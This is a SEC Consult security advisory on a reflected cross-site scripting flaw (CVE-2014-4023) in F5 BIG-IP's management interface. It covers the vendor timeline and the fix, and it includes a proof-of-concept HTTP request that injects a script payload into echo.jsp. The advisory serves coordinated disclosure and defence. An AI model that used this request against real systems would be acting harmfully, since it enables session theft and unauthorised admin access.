Reflected Cross-Site Scripting in F5 BIG-IP

SEC Consult Vulnerability Lab Security Advisory < 20140828-0 >

=======================================================================

title: Reflected Cross-Site Scripting

product: F5 BIG-IP

vulnerable version: <= 11.5.1

fixed version: > 11.6.0

impact: Medium

CVE number: CVE-2014-4023

homepage: f5.com

found: 2014-07-07

by: Stefan Viehböck

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

Vendor/product description:

-----------------------------

"The BIG-IP product suite is a system of application delivery services that

work together on the same best-in-class hardware platform or software virtual

instance. From load balancing and service offloading to acceleration and

security, the BIG-IP system delivers agility—and ensures your applications

are fast, secure, and available."

URL: f5.com/products/big-ip

 

Vulnerability overview/description:

-----------------------------------

BIG-IP suffers from a reflected Cross-Site Scripting vulnerability,

which allow an attacker to steal other users sessions, to impersonate other

users and to gain unauthorized access to the admin interface.

 

Proof of concept:

-----------------

The following HTTP request triggers the vulnerability:


POST /tmui/dashboard/echo.jsp HTTP/1.1
Host: BIGIP
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 29

<script>alert('xss')</script>

The server does not properly encode user supplied information and returns it

to the user resulting in Cross-Site Scripting.

 

Vulnerable / tested versions:

-----------------------------

More information can be found at:

support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html

 

Vendor contact timeline:

------------------------

2014-07-08: Sending advisory and proof of concept exploit via encrypted

channel.

2014-07-09: Vendor confirms receipt of advisory. States that fix will be

released in the "next 6 weeks or so"

2014-07-24: Vendor provides CVE: CVE-2014-4023

2014-08-26: Vendor releases fixed version.

2014-08-28: SEC Consult releases a coordinated security advisory.

 

Solution:

---------

Update to the newest version.

More information can be found at:

support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html

 

Workaround:

-----------

No workaround available.

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

Interested in working with the experts of SEC Consult?

Write to career@sec-consult.com

EOF Stefan Viehböck / @2014